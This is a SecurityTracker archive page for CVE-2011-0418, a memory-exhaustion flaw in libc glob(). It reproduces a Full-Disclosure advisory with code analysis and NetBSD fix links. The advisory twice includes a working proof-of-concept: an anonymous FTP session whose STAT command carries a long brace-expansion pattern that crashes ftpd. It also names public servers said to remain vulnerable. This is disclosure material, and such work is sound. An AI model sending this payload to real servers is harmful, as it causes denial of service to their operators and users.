SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   libc Vendors:   [Multiple Authors/Vendors]
libc glob() Function Lets Remote Users Consume All Available Memory
SecurityTracker Alert ID:  1025466
SecurityTracker URL:  http://securitytracker.com/id/1025466
CVE Reference:   CVE-2011-0418   (Links to External Site)
Date:  May 2 2011
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in libc. A remote or local user can cause denial of service conditions.

A remote or local user can supply specially crafted data containing patterns that expand to a very large number of matches to cause the glob() function to consume all available memory on the target system.

NetBSD is affected. Other operating systems may be affected.

Demonstration exploit code is available at:

http://cxib.net/stuff/glob-0day.c

A demonstration exploit (against NetBSD's ftpd) is provided:

USER anonymous
PASS bla@bla.bla
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}

Maksymilian Arciemowicz reported this vulnerability.

The original advisory is available at:

http://securityreason.com/achievement_securityalert/97

Impact:   A remote user or local can cause denial of service conditions.
Solution:   NetBSD has issued a fix, available at:

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c

Cause:   Resource error
Underlying OS:  UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion

This is a multi-part message in MIME format.
--------------010407030005070407040204
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Multiple Vendors libc/glob() GLOB_BRACE|GLOB_LIMIT memory exhaustion ]

Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
 - Dis.: 19.01.2011
 - Pub.: 02.05.2011

CVE: CVE-2011-0418

Affected Software (verified):
- - NetBSD 5.1
- - and more

Original URL:
http://securityreason.com/achievement_securityalert/97


- --- 0.Description ---
#include <glob.h>

int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);

Description

This function expands a filename wildcard which is passed as pattern.

GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This
option should be set for programs that can be coerced to a denial of
service attack via patterns that expand to a very large number of
matches, such as a long string of */../*/..


- --- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory
exhaustion ---
Analyzing history of GLOB_LIMIT, we should start since 2001, where it
has been added to protect ftp servers before memory exhaustion.

http://www.mail-archive.com/bugtraq@securityfocus.com/msg04960.html

Any 'pattern', should be limited and controlled by GLOB LIMIT. Algorithm
used in glob(3) is not optimal, and doesn't support functions like
realpath() to eliminate duplicates. It's not easy to predict the
greatest possible complexity. Anyway in 2010, netbsd has extended
GLOB_LIMIT for a few new limits like: stats, readdir and malloc

OpenBSD has localized some integer overflow. In glob(3) function, exists
some malloc() allowing allocate n<INT_MAX bytes into memory.

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h

- -globextend()/openbsd--
  749: 	newn = 2 + pglob->gl_pathc + pglob->gl_offs;
  750: 	if (pglob->gl_offs >= INT_MAX ||
  751: 	    pglob->gl_pathc >= INT_MAX ||
  752: 	    newn >= INT_MAX ||
  753: 	    SIZE_MAX / sizeof(*pathv) <= newn ||
  754: 	    SIZE_MAX / sizeof(*statv) <= newn) {
  755:  nospace:
  756: 		for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) {
  757: 			if (pglob->gl_pathv && pglob->gl_pathv[i])
  758: 				free(pglob->gl_pathv[i]);
  759: 			if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 &&
  760: 			    pglob->gl_pathv && pglob->gl_pathv[i])
  761: 				free(pglob->gl_statv[i]);
  762: 		}
  763: 		if (pglob->gl_pathv) {
  764: 			free(pglob->gl_pathv);
  765: 			pglob->gl_pathv = NULL;
  766: 		}
  767: 		if (pglob->gl_statv) {
  768: 			free(pglob->gl_statv);
  769: 			pglob->gl_statv = NULL;
  770: 		}
  771: 		return(GLOB_NOSPACE);
  772: 	}
- -globextend()/openbsd--

however SIZE_MAX and INT_MAX doesn't protect us before memory
exhaustion. The real problem here is uncontrolled malloc(3) call.
globextend() will be executed a lot of times and we should reduce calls
to glob0() and globexp1(). Therefore has been created a new limit,
limiting 'braces' used in 'pattern'.

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29

If we don't reduce this call

- -globextend()/netbsd--
static int
globextend(const Char *path, glob_t *pglob, size_t *limit)
{
	char **pathv;
	size_t i, newsize, len;
	char *copy;
	const Char *p;

	_DIAGASSERT(path != NULL);
	_DIAGASSERT(pglob != NULL);

	newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);
	pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) :
	malloc(newsize); <==== UNSECURE CALL
...
- -globextend()/netbsd--

newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);

malloc(3) try allocate (4*pglob->gl_pathc) bytes.

- -PoC-
USER anonymous
PASS bla@bla.bla
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
- -PoC-

in result we get

Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out
of swap

Many servers are still vulnerable to the above vulnerability and
CVE-2010-4754, CVE-2010-4755, CVE-2010-4756, CVE-2010-2632. Servers like
ftp.sun.com ftp.sony.com seems still be affected.


- --- 2. References ---
http://securityreason.com/achievement_securityalert/89
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.avaya.com/css/P8/documents/100127892
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4754
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4755
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4756
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0418

PoC:
change 'pattern' in
http://cxib.net/stuff/glob-0day.c


- --- 3. Fix ---
Use CVS netbsd-5 netbsd-5-1 netbsd-5-0
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c


- --- 4. Greets ---
Specials thanks for Christos Zoulas, spz

sp3x, Infospec


- --- 5. Contact ---
Author: Maksymilian Arciemowicz

Email:
- - cxib {a\./t] securityreason [d=t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/

- -- 
Best Regards
pub   4096R/D6E5B530 2010-09-19
uid                  Maksymilian Arciemowicz (cx) <max@cxib.net>
sub   4096R/58BA663C 2010-09-19
-----BEGIN PGP SIGNATURE-----

iQIcBAEBAgAGBQJNvemQAAoJEIO8+dzW5bUw+/gP/jF5j08Wruacslg1OqyX5Ewz
uGGsNWN+/6ZABiYlgOqiv8TBtnV1RXXFcRwNQRoTuLl/KRN7RV8EAbuqD9my/KPJ
j2VbuDeNKAnAQVkAJVWg+CXSeh0H+AXbnnykSJND4mt2bgm22g4kOeEVjfhshUme
5xwAzAK8Hgcjso/BBQza7mRpFK14hAvZs0pMqZzGvcCZ+W9dLAEQkz5WnCfAumS5
wJgZD/TvOkX2dzg75Fy302ufiGBQtTFCpnuC4NopCv78tXazZkeW3kNrSZZtLUES
h54BYtITB6LM+YGi5YaSK9YvsTo1k0kYknyvu0NB2nxBDayAe1+PbIZRlrw6Xn6x
zEm4ao+FnRmJQ7RpIqKDp2PWcjaQPEzzqfVrxUUV/Sk6RB9diSJZiIvFxEXEyUfj
I5xwnCgHtS/WBiq3eExXPiJ/QPNziZnADVHfGVrqgcbtyvNQ57LiP65IDZish3JE
4Uu8YjrzO3fcSe//Q7CFz5n7bMDFcQxFUMGhG0xAQwEjbMRn6bO/zhDsn15uoSj1
w17bfvIdrYHnTivxCZ+Q3WChIYEAO6QcgfIM+T427+X2L3RxmklDU5h2Zdz+Q+NZ
6pd2drTZC72HQQL5eoD3q6FQosc3MblKGsHc8eixJ/XeAZBHGkehhmDySCf9o93u
0ZkDyZgB1oPnlfy+0jPU
=h+ct
-----END PGP SIGNATURE-----

--------------010407030005070407040204
Content-Type: application/pgp-keys;
 name="0xD6E5B530.asc"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
 filename="0xD6E5B530.asc"

-----BEGIN PGP PUBLIC KEY BLOCK-----

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
fjZe+G0TJgIG+Q==
=9W/9
-----END PGP PUBLIC KEY BLOCK-----

--------------010407030005070407040204
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--------------010407030005070407040204--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC